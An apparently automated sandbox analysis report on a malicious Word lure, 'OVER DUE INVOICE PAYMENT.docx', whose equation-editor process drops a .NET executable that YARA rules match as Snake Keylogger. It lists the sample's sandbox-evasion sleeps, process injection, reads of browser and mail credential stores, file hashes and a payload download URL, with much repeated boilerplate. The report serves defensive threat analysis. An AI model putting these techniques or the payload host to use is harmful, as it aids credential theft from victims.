Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 2160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 1E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 2350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 340000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 600000	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Window / User API: threadDelayed 9713

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3340	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3532	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616	Thread sleep time: -7800000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620	Thread sleep count: 9713 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620	Thread sleep count: 98 > 30	Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Code function: 10_2_001CFCB8 LdrInitializeThunk,

10_2_001CFCB8

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Memory written: C:\Users\user\AppData\Roaming\obi23456.scr base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Queries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Queries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Windows Analysis Report
OVER DUE INVOICE PAYMENT.docx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1467922
Product:	CloudBasic
Start time:	02:56:55
Start date:	05.07.2024
Sample:	OVER DUE INVOICE PAYMENT.docx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	9f3fd4e8aa2ad81966d0c2a036d1e901
SHA1:	80a58393acb58fcc666e56b514994d98ba3f4716
SHA256:	cd9cf022180c8c6f6c4fb0d76476bf2e9382128d28a4686114c50448934e5381
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 58.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)	data	0C55C56C4C801103228B2C7F616E7B30	6A169F3162ED2C81EA32A31BFC91E1699FCCD2D3	66474E93FBB847138469757639D2B3A6995DE4D9AC6583322B3A789719485B97
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc	Rich Text Format data, version 1	3F9A089317AFA13A17B61D5E0F95B75E	F5129818D643FBA59BF77BC2785EEF2AF34DB679	09CC281D7242AEDDD2DE25D63EF16E9B8D190BD06D31928410FDAEF1E5A5C351
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F7BDADAFF67E573F145D2E8E32E32CD8	CFD1377D49E09ECFA842760DD9CC78CC17A34628	FE80EEADE269CE2B6688E039296FC9E9743E24F881341ADAD24E220967312316
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc	Rich Text Format data, version 1	3F9A089317AFA13A17B61D5E0F95B75E	F5129818D643FBA59BF77BC2785EEF2AF34DB679	09CC281D7242AEDDD2DE25D63EF16E9B8D190BD06D31928410FDAEF1E5A5C351
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp	Composite Document File V2 Document, Cannot read section info	A216EBA76D3A09C00DEFC23ED7B80160	F86695B8AFE94D3C3157B290C8BF90EC3D0C61EC	C215CB87322E43545144C1E06275BF92D734B194D74224A919E7C788ADAA2385
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{286F2A7E-F7F4-4D14-9522-7CD16AE70F3F}.tmp	data	437903A0DF2D0268D94F032D6F14F6F6	B414578A6BD6FC5753D65ECB8A3256E404ED2F2E	04A59DC28E79D5892B72ED25915713826EDA3CE2896DB00103B7EFFBB6B8CE9E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5CE991A5-ECDD-4D90-A7A9-1E0E273031B4}.tmp	data	D13213F6EBEA5B155B0351269FCEE000	1ACC77B634DC01BB1F63DD1121C13B24E68FA56D	EE640E104E41FC682B4F137446D84FF12ECCA30E34DD5EC2D1DE00BF0A21D7D9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{93BD778F-76C5-482F-AFE4-8C9D206A27D0}.tmp	data	AC7C710B6CA9D66ED9923D65C708B21B	756E2D7C42EF9BF05DA7EA871B077BB6DAFCD8E7	C1BEA8318A21530E776F4E3336A3F5E8AFE04F52FBB44F254304A9F36C570B68
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFDE4C25-701B-4F27-93CB-2693CC173C87}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\{C6E1DAFB-D5C3-4468-976B-7C1C547D1675}	data	0C55C56C4C801103228B2C7F616E7B30	6A169F3162ED2C81EA32A31BFC91E1699FCCD2D3	66474E93FBB847138469757639D2B3A6995DE4D9AC6583322B3A789719485B97
C:\Users\user\AppData\Local\Temp\{D1236A15-FCA5-4B0C-9CDB-9BBC48C1E16C}	data	AA0B5EE04C7BEBD3AEFAD29D2959A967	37A6501501DD3AD20A2B12437DCF5014BCC1611A	39EA4E568D565CD60F6C85A04B0E979C11ADF35491D01873832798435728E83C
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\OVER DUE INVOICE PAYMENT.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Thu Jul 4 23:57:42 2024, length=16418, window=hide	68865068F3EBDC0C62772E890D46A287	A365121AC66EB6316A5541440EDBECBF7835E3CE	F966A73FE5C60420267DA6EF3DFC31A6513E56D88EAF1D77E3670A05A4B010EE
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [folders]	BC18D82BDF61FA99A66688A09FADE946	18F8F710ABD1BF5A1B3614B7A577B5B3582AAF2F	3B801759030D606570D43DBA1089F4C0D9DE3A6E048C85B39678FB74EA8A5191
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.url	MS Windows 95 Internet shortcut text (URL=<https://riell.top/obb.doc>), ASCII text, with CRLF line terminators	A085681EBB461A55BE28CF9AE262880E	2E53D304FB02FDF061F1DF2329C1876325364CBB	578E2B190FC08307F49BE0F232310D0CA9746064ED878FE41A1734B3B532546D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.url	MS Windows 95 Internet shortcut text (URL=<https://riell.top/>), ASCII text, with CRLF line terminators	7C4B92A4C06A7AA3645579A99B8D83AE	30F8E7A48E68F04FABEDB17481970880081512D4	126F147D79C43D1F127C372D0B09EB456576358A1B71AE46459F2D1F06161D8D
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	89AFCB26CA4D4A770472A95DF4A52BA8	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\obi23456.scr	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F7BDADAFF67E573F145D2E8E32E32CD8	CFD1377D49E09ECFA842760DD9CC78CC17A34628	FE80EEADE269CE2B6688E039296FC9E9743E24F881341ADAD24E220967312316
C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docx	data	89AFCB26CA4D4A770472A95DF4A52BA8	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17

Windows Analysis Report OVER DUE INVOICE PAYMENT.docx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
OVER DUE INVOICE PAYMENT.docx

Malware Threat Intel
Provided by